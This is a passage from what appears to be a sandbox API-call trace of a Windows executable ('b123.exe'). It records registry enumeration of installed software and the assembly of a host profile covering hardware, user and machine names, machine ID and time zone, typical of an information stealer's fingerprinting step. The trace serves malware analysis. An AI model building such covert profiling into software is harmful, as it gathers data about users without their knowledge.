X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161" [0235.135] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\n" [0235.135] RegCloseKey (hKey=0x384) returned 0x0 [0235.135] RegEnumKeyExA (in: hKey=0x388, dwIndex=0x1f, lpName=0x1983bc, lpcchName=0x197fac, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{B175520C-86A2-35A7-8619-86DC379688B9}", lpcchName=0x197fac, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0235.135] wsprintfA (in: param_1=0x197fbc, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{B175520C-86A2-35A7-8619-86DC379688B9}") returned 90 [0235.135] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{B175520C-86A2-35A7-8619-86DC379688B9}", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fb8 | out: phkResult=0x197fb8*=0x384) returned 0x0 [0235.135] RegQueryValueExA (in: hKey=0x384, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987c0, lpData=0x197bac, lpcbData=0x197fac*=0x400 | out: lpType=0x1987c0*=0x1, lpData="Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030", lpcbData=0x197fac*=0x3e) returned 0x0 [0235.135] lstrlenA (lpString="Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030") returned 61 [0235.135] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\n", lpString2="Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030" [0235.136] RegQueryValueExA (in: hKey=0x384, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x1987c0, lpData=0x197bac, lpcbData=0x197fac*=0x400 | out: lpType=0x1987c0*=0x1, lpData="11.0.61030", lpcbData=0x197fac*=0xb) returned 0x0 [0235.136] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030", lpString2=" " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 " [0235.136] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 ", lpString2="11.0.61030" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030" [0235.136] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\n" [0235.136] RegCloseKey (hKey=0x384) returned 0x0 [0235.136] RegEnumKeyExA (in: hKey=0x388, dwIndex=0x20, lpName=0x1983bc, lpcchName=0x197fac, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}", lpcchName=0x197fac, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0235.136] wsprintfA (in: param_1=0x197fbc, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}") returned 90 [0235.136] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fb8 | out: phkResult=0x197fb8*=0x384) returned 0x0 [0235.136] RegQueryValueExA (in: hKey=0x384, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987c0, lpData=0x197bac, 